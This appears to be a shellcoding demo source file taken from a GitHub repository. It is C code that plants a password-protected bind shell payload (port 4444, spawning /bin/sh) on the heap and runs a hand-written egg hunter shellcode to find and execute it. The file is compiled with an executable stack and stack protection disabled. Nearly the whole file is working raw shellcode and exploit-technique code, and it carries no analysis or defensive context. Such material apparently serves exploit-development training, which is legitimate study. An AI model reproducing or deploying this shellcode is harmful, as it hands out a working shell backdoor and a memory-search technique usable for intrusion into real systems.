Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
46 lines (34 sloc) 2.87 KB
// Egg Hunter Demo - Payload on heap
// Compile with:
// gcc -z execstack -fno-stack-protector egg_hunter_demo.c -o egg_demo
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
unsigned char egghunter[] = \
"\xbb\xeb\x02\xeb\xfc\x53\x48\xc1\xe3\x20\x48\x0b\x1c\x24\x48\x31\xd2\x52\xb6\x10\x5f\x57\x5e\x6a\x15\x58\x0f\x05\x3c\xf2\x75\x05\x48\x01\xd7\xeb\xf2\x52\x59\x83\xe9\x08\x48\x3b\x1f\x74\x0b\x48\xff\xc7\xe2\xf6\x48\x83\xc7\x08\xeb\xdd\xff\xe7";
// Bind shell payload - Listens on 127.0.0.1 4444
unsigned char payload[] = \
"\x48\x89\xe5\xeb\x04\x41\x5f\xeb\x5c\xe8\xf7\xff\xff\xff\x53\x70\x65\x61\x6b\x20\x66\x72\x69\x65\x6e\x64\x20\x61\x6e\x64\x20\x65\x6e\x74\x65\x72\x3a\x20\x70\x61\x73\x73\x77\x6f\x72\x64\x57\x65\x6c\x63\x6f\x6d\x65\x0a\x57\x72\x6f\x6e\x67\x0a\x48\x31\xc0\x50\x5b\x48\x83\xc0\x3c\x48\x83\xc3\x01\x48\x89\xec\x0f\x05\x48\x8b\x7d\xd8\x48\x31\xc0\x49\x89\xc2\x49\x89\xc0\x49\x89\xc1\x48\x83\xc0\x2c\x0f\x05\xc3\x48\x31\xc0\x50\x66\x05\x11\x5c\x48\xc1\xe0\x10\x66\x83\xc0\x02\x50\x48\x31\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc0\x27\x0f\x05\x48\x83\xf8\xff\x7e\xa8\x50\x48\x31\xc0\x48\x83\xc0\x31\x48\x8b\x7d\xe8\x48\x8d\x75\xf0\x48\x31\xd2\x48\x83\xc2\x10\x52\x0f\x05\x48\x83\xf8\xff\x7e\x88\x48\x31\xc0\x48\x83\xc0\x02\x48\x89\xc6\x48\x83\xc0\x30\x0f\x05\x48\x83\xf8\xff\x0f\x8e\x6e\xff\xff\xff\x48\x31\xc0\x48\x83\xc0\x2b\x48\x8b\x7d\xe8\x48\x8d\x75\xf0\x48\x8d\x55\xe0\x0f\x05\x48\x83\xf8\xff\x0f\x8e\x4f\xff\xff\xff\x50\x4c\x89\xfe\x48\x31\xd2\x48\x83\xc2\x18\xe8\x51\xff\xff\xff\x48\x8b\x7d\xd8\x48\x8d\x75\xf0\x48\x31\xc0\x50\x50\x5a\x41\x5a\x49\x89\xc0\x49\x89\xc1\x48\x83\xc2\x08\x48\x83\xc0\x2d\x0f\x05\x48\x8d\x75\xf0\x49\x8d\x7f\x18\x48\x31\xc9\x48\x83\xc1\x08\xa6\x75\x14\xe2\xfb\x49\x8d\x77\x20\x48\x31\xd2\x48\x83\xc2\x08\xe8\x0d\xff\xff\xff\xeb\x25\x49\x8d\x77\x28\x48\x31\xd2\x48\x83\xc2\x06\xe8\xfb\xfe\xff\xff\x48\x31\xc0\x50\x5e\x48\x83\xc0\x30\x5f\x48\x83\xc6\x02\x0f\x05\xe9\x66\xff\xff\xff\x48\x31\xc0\x48\x83\xc0\x21\x49\x89\xc0\x48\x8b\x7d\xd8\x48\x31\xf6\x0f\x05\x4c\x89\xc0\x48\xff\xc6\x0f\x05\x4c\x89\xc0\x48\xff\xc6\x0f\x05\x48\x31\xc0\x50\x5a\x48\xbb\x78\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x48\x89\x5d\xf0\x48\x8d\x7d\xf0\x50\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\xe8\x86\xfe\xff\xff";
main()
{
int nPages, nBytes;
time_t t;
printf("Allocating heap data\n");
srand((unsigned) time(&t));
nPages = (rand()%1000)+2;
printf("Padding heap with %d pages of junk\n", nPages);
for(;nPages!=0;--nPages)
{
unsigned char *padding = malloc(1024);
}
unsigned char *heap = malloc(1024);
nBytes = rand()%512;
printf("Padding payload page by %d bytes\n", nBytes);
printf("Appending payload\n");
memcpy(&heap[nBytes], "\xeb\x02\xeb\xfc", 4);
memcpy(&heap[nBytes+4], &heap[nBytes], 4);
memcpy(&heap[nBytes+8], payload, 438);
printf("Triggering egg hunter\n");
int (*ret)() = (int(*)())egghunter;
ret();
}